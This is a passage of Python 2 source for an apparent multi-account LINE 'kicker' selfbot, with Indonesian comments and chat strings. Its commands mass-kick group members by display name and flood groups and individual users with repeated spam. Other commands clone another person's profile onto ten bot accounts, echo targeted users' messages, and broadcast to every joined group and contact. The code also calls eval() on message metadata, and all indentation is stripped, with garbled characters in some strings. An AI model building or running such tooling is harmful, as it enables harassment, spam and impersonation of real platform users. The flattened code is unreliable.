ki2.sendText(msg.to,"Qo salamnya gak ada yang jawab ya..!!")
ki3.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kk.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kc.sendText(msg.to,"Nah salamnya jawab sendiri dah")
#----------------Fungsi Kick User Target Start----------------------#
elif "Sok " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Sok ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).sendText(msg.to,"Maaf ya....")
elif "Nk " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Cium " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Tajong " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Tajong ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam1.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
satpam1.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
#-------------Fungsi Spam Finish---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
cl.sendText(msg.to, "Target Spam, Done...!!!")
kk.sendText(msg.to, "Target Spam, Done...!!!")
k1.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Mungkin")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
k1.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati�","Ida�","Uke�","Alyn�","Ikka�","Yunikey�","Qwenie�","Gendis�","Aryani�","Nindy�","Wina�","Dewi�","Ifah�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
ki.sendText(msg.to,jawaban)
ki.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun�","Ahmad khan�","Hajir�","Dd�","Indra�","Jeong�","Yogi�","Ary??�","Ucil�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
ki.sendText(msg.to,jawaban)
k5.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
k3.sendText(msg.to,jawaban)
k3.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
kcl.sendText(msg.to,jawaban)
k1.sendText(msg.to,jawaban)
k1.sendText(msg.to,jawaban)
elif "Pahala @" in msg.text:
tanya = msg.text.replace("Pahala @","")
jawab = ("10%","20%","40%","50%","70%","80%","Tidak ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,"Pahalanya" + tanya + "adalah " + jawaban + "\nTobatlah Nak\nPerbaikin Pahalamu")
#-------------------Finish-----------------------#
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot sudah berjalan selama "+waktu(eltime)
cl.sendText(msg.to,van)
#-------------Fungsi Broadcast Start------------#
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
cl.sendText(msg.to,(bctxt))
cl.sendText(msg.to,(bctxt))
k1.sendText(msg.to,(bctxt))
k2.sendText(msg.to,(bctxt))
k3.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot kadieu","Bot arampih"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
gid = k1.getGroupIdsJoined()
gid = k2.getGroupIdsJoined()
gid = k3.getGroupIdsJoined()
gid = k4.getGroupIdsJoined()
gid = k5.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
k1.leaveGroup(i)
k2.leaveGroup(i)
k3.leaveGroup(i)
k4.leaveGroup(i)
k5.leaveGroup(i)
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh Owner Bots...!!!\nMakasih...!!!")
else:
cl.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body Har Har")
kk.sendText(msg.to,"Hai Every Body Har Har")
kc.sendText(msg.to,"Hai Every Body Har Har")
elif msg.text in ["nah","Nah"]:
ki.sendText(msg.to,"Kan")
kk.sendText(msg.to,"Kan")
kc.sendText(msg.to,"Kan")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
ki.sendText(msg.to,"★")
kk.sendText(msg.to,"★★")
kc.sendText(msg.to,"★★★")
ks.sendText(msg.to,"★★★★")
cl.sendText(msg.to,"★★★★★")
k1.sendText(msg.to,"★★★★★★")
k2.sendText(msg.to,"★★★★★★★")
k3.sendText(msg.to,"★★★★★★★★")
k4.sendText(msg.to,"★★★★★★★★★")
k5.sendText(msg.to,"★★★★★★★★★★")
random.choice(KAC).sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰]")
#-------------Fungsi Respon Finish---------------------#
#==========================================
elif "Youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif "youtube " in msg.text.lower():
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#=======================================
elif msg.text in ["Backup","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
ki.updateDisplayPicture(backup.pictureStatus)
kk.updateDisplayPicture(backup.pictureStatus)
kc.updateDisplayPicture(backup.pictureStatus)
ks.updateDisplayPicture(backup.pictureStatus)
k1.updateDisplayPicture(backup.pictureStatus)
k2.updateDisplayPicture(backup.pictureStatus)
k3.updateDisplayPicture(backup.pictureStatus)
k4.updateDisplayPicture(backup.pictureStatus)
k5.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateProfile(backup)
kk.updateProfile(backup)
kc.updateProfile(backup)
ks.updateProfile(backup)
k1.updateProfile(backup)
k2.updateProfile(backup)
k3.updateProfile(backup)
k4.updateProfile(backup)
k5.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
k1.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
ki.sendText(msg.to, str(e))
kk.sendText(msg.to, str(e))
kc.sendText(msg.to, str(e))
ks.sendText(msg.to, str(e))
k1.sendText(msg.to, str(e))
k2.sendText(msg.to, str(e))
k3.sendText(msg.to, str(e))
k4.sendText(msg.to, str(e))
k5.sendText(msg.to, str(e))
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
ki.CloneContactProfile(target)
kk.CloneContactProfile(target)
kc.CloneContactProfile(target)
ks.CloneContactProfile(target)
k1.CloneContactProfile(target)
k2.CloneContactProfile(target)
k3.CloneContactProfile(target)
k4.CloneContactProfile(target)
k5.CloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["Kembali awal"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
kk.updateDisplayPicture(backup.pictureStatus)
kk.updateProfile(backup)
kc.updateDisplayPicture(backup.pictureStatus)
kc.updateProfile(backup)
ks.updateDisplayPicture(backup.pictureStatus)
ks.updateProfile(backup)
k1.updateDisplayPicture(backup.pictureStatus)
k1.updateProfile(backup)
k2.updateDisplayPicture(backup.pictureStatus)
k2.updateProfile(backup)
k3.updateDisplayPicture(backup.pictureStatus)
k3.updateProfile(backup)
k4.updateDisplayPicture(backup.pictureStatus)
k4.updateProfile(backup)
k5.updateDisplayPicture(backup.pictureStatus)
k5.updateProfile(backup)
cl.sendText(msg.to, "Backup Sukses")
except Exception as e:
cl.sendText(msg.to, str (e))
ki.sendText(msg.to, str (e))
kk.sendText(msg.to, str (e))
kc.sendText(msg.to, str (e))
ks.sendText(msg.to, str (e))
k1.sendText(msg.to, str (e))
k2.sendText(msg.to, str (e))
k3.sendText(msg.to, str (e))
k4.sendText(msg.to, str (e))
k5.sendText(msg.to, str (e))
#--------------------------------------------------------
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
